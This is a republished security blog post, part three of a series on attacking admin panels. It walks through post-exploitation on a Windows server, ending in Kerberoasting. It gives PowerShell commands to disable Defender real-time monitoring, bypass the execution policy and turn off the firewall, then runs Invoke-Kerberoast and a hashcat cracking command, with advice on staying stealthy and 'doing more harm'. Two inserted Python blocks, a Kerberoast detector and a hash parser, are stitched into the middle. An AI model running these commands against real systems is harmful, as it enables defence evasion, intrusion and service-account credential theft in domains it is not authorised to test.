How To Attack Admin Panels Successfully Part 3
2023-2-26 21:16:42 Author: infosecwriteups.com (view original)

Are you Attacking Web Apps Admin Panels The Right Way?

Photo by Ed Hardie on Unsplash

You should start here: Part_1

Picking up from where we left off in part two. This time, we are on a Windows Server. Personally, I’m not a big fan of Windows Servers, and once you try to become a professional Red Teamer, you will understand why. Today, we will learn about a very basic and simple Active Directory attack, a topic not much talked about in the Bug Bounty community since most reports involve just web application vulnerabilities.

Tree

Unlike Linux servers, because of the complexity of the Windows ecosystem, there are too many different directions to go from here, which is why I will go for the simplest path. Everything will depend on the group policies applied to the server. Your best bet is to enumerate everything. We want to be as stealthy as possible, which is why we will do everything manually, without tools like Mimikatz that can trigger alerts and get you caught. You will land in CMD, and many directories may be locked, which is why we will use PowerShell for enumeration.

CMD.exe

The first thing to check is the current firewall profile, using the netsh command.

Listing the current profile for the firewall on Windows

In this case, the current firewall profile is active, so let’s have a closer look at the firewall rules. We can list firewall rules with the netsh command using the following syntax:

firewall rules

Some Enumeration 🕵

The output generated by schtasks includes a lot of useful information such as the task to run, the next time it is due to run, the last time it ran, and details about how often it will run.

Kerberoasting tools typically request RC4 encryption when initiating TGS-REQ requests. This is because RC4 is weaker and easier to crack offline with tools such as Hashcat than other encryption algorithms such as AES-128 and AES-256. RC4 (type 23) hashes begin with $krb5tgs$23$*, while AES-256 (type 18) hashes start with $krb5tgs$18$*.

Kerberoasting is a post-exploitation attack technique that attempts to crack the password of a service account within Active Directory (AD). The general concept is to request service tickets (TGS). These tickets are encrypted with keys derived from the service account's password, so the credentials can be cracked offline. Any domain account that can request a TGS is what we need, which is any account, since no special privileges are required. To perform this attack we will use the Invoke-Kerberoast script and the commands below.
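Detection logic for the RC4 preference described above, added here as an example and not part of the original article: it scans Windows Security event 4769 (service ticket requested) records for successful RC4-HMAC (TicketEncryptionType 0x17) requests against user-backed service accounts and raises an alert when one requester collects tickets for several such accounts. The field names follow the 4769 event schema; the sample records and the threshold of three services are constructed.

```python
"""Flag Kerberoast-like service-ticket requests in Windows 4769 events.

Added example (not from the original article). Heuristic: a successful
TGS request (Status 0x0) for a user-backed service account (no trailing
'$', not krbtgt) using RC4-HMAC (TicketEncryptionType 0x17) is suspicious,
and one requester asking for many such tickets is more so.
"""
from collections import defaultdict

RC4_HMAC = "0x17"  # TicketEncryptionType value logged for RC4; AES is 0x11/0x12

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"TargetUserName": "webapp@CORP.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.25", "Status": "0x0"},
    {"TargetUserName": "webapp@CORP.LOCAL", "ServiceName": "svc_http",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.25", "Status": "0x0"},
    {"TargetUserName": "webapp@CORP.LOCAL", "ServiceName": "svc_backup",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.25", "Status": "0x0"},
    {"TargetUserName": "alice@CORP.LOCAL", "ServiceName": "FS01$",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.40", "Status": "0x0"},
    {"TargetUserName": "bob@CORP.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.41", "Status": "0x0"},
    {"TargetUserName": "bob@CORP.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.41", "Status": "0x0"},
]


def is_roastable_request(ev):
    """True for a successful RC4 TGS request against a user-backed service account."""
    svc = ev["ServiceName"]
    if svc.endswith("$") or svc.lower() == "krbtgt":  # machine accounts and krbtgt
        return False
    return ev["Status"] == "0x0" and ev["TicketEncryptionType"] == RC4_HMAC


def find_kerberoast_suspects(events, min_services=3):
    """Map requester -> sorted services requested with RC4, keeping only
    requesters that asked for at least `min_services` distinct roastable tickets."""
    per_user = defaultdict(set)
    for ev in events:
        if is_roastable_request(ev):
            per_user[ev["TargetUserName"]].add(ev["ServiceName"])
    return {u: sorted(s) for u, s in per_user.items() if len(s) >= min_services}


if __name__ == "__main__":
    for user, services in find_kerberoast_suspects(SAMPLE_EVENTS).items():
        print(f"ALERT {user} requested RC4 service tickets for {services}")
```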

C:\Users\webapp> powershell.exe
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Users\webapp> Set-MpPreference -DisableRealtimeMonitoring $true
PS C:\users\webapp\desktop> Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser
PS C:\Users\webapp> powershell -nOp -ExeC bypass
PS C:\Users\webapp> Import-Module .\Invoke-Kerberoast.ps1
PS C:\Users\webapp> Get-Module

ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Script 0.0 k
Manifest 3.1.0.0 Microsoft.PowerShell.Management {Add-Computer, Add-Content, Checkpoint-Computer, Clear-Con...
Manifest 3.1.0.0 Microsoft.PowerShell.Utility {Add-Member, Add-Type, Clear-Variable, Compare-Object...}
Script 2.0.0 PSReadLine {Get-PSReadLineKeyHandler, Get-PSReadLineOption, Remove-PS...

Pro Bonus Tip 💸

If, for some evil reason, you have Administrator rights, you can use this command to turn off the firewall:

netsh advfirewall set allprofiles state off

./Invoke-Kerberoast.ps1

TGS hash to be cracked offline

The structure of an SPN consists of three (3) main parts: the service class (the service type, e.g., SQL, Web, Exchange, File), the host where the service usually runs, given as an FQDN (Fully Qualified Domain Name), and the port number.
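A parser for the $krb5tgs$ hash lines and the SPN embedded in them, added as an example and not from the article or the Invoke-Kerberoast project: it labels the etype (RC4 versus AES, with the matching hashcat mode) and splits the SPN into the parts described above, so a defender can tell which accounts still issue RC4 tickets. The sample lines are constructed with shortened hex tails, and the '*spn*' placement for AES lines is an assumption based on common tool output.

```python
"""Triage Kerberoast hash lines: etype, account, realm and SPN parts.

Added example, not from the article. The RC4 layout
$krb5tgs$23$*user$REALM$spn*$checksum$edata matches hashcat mode 13100;
the '*spn*' placement for AES lines (modes 19600/19700) is an assumption
based on common tool output, and the SPN may be absent there.
"""

ETYPES = {"23": "RC4-HMAC (hashcat 13100)", "17": "AES128-CTS (hashcat 19600)",
          "18": "AES256-CTS (hashcat 19700)"}

# Constructed sample lines; the hex tails are shortened placeholders, not real tickets.
SAMPLE_HASHES = [
    "$krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/sql01.corp.local:1433*$"
    + "0a" * 16 + "$" + "1b" * 32,
    "$krb5tgs$18$svc_http$CORP.LOCAL$*HTTP/web01.corp.local*$"
    + "2c" * 12 + "$" + "3d" * 32,
    "$krb5tgs$18$svc_backup$CORP.LOCAL$" + "4e" * 12 + "$" + "5f" * 32,
]


def parse_spn(spn):
    """Split 'class/host[:port][/name]' into its parts; missing parts are None."""
    if not spn:
        return None
    service_class, _, rest = spn.partition("/")
    host, _, name = rest.partition("/")
    host, _, port = host.partition(":")
    return {"class": service_class, "host": host,
            "port": int(port) if port.isdigit() else None, "name": name or None}


def parse_krb5tgs(line):
    """Return etype, user, realm and parsed SPN for one $krb5tgs$ line, or None."""
    if not line.startswith("$krb5tgs$"):
        return None
    fields = line[len("$krb5tgs$"):].split("$")
    etype, rest = fields[0], fields[1:]
    if rest[0].startswith("*"):                     # RC4 layout: *user$REALM$spn*
        user, realm, spn = rest[0][1:], rest[1], rest[2].rstrip("*")
    else:                                           # AES layout: user$REALM[$*spn*]
        user, realm = rest[0], rest[1]
        spn = rest[2].strip("*") if rest[2].startswith("*") else None
    return {"etype": etype, "etype_name": ETYPES.get(etype, "unknown"),
            "user": user, "realm": realm, "spn": parse_spn(spn),
            "weak_rc4": etype == "23"}


if __name__ == "__main__":
    for h in SAMPLE_HASHES:
        print(parse_krb5tgs(h))
```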

Save the hash to hash.txt and run the command below to crack the password using Hashcat. John the Ripper can also be used for this task.

hashcat -m 13100 --force <TGSs_file> <wordlist.txt>

Summary

From here, we can move on to what is known as the Kerberos silver ticket attack. Keep in mind that this can only be used against one service (such as MSSQL). It will give you administrator rights only to that service, not to any other AD service. You will be able to enable xp_cmdshell, which lets you spawn processes and view all databases on the server. Now that you have a username and password, you can go back to Kali Linux and do more harm. AD attacks are infinite, and this was something very basic to give you a start. I hope you like it, and if you are interested in these kinds of articles, don’t forget to add me to your mailing list.


Article source: https://infosecwriteups.com/how-to-attack-admin-panels-successfully-part-3-ccf36cbc1c57?source=rss----7b722bfd1b8d--bug_bounty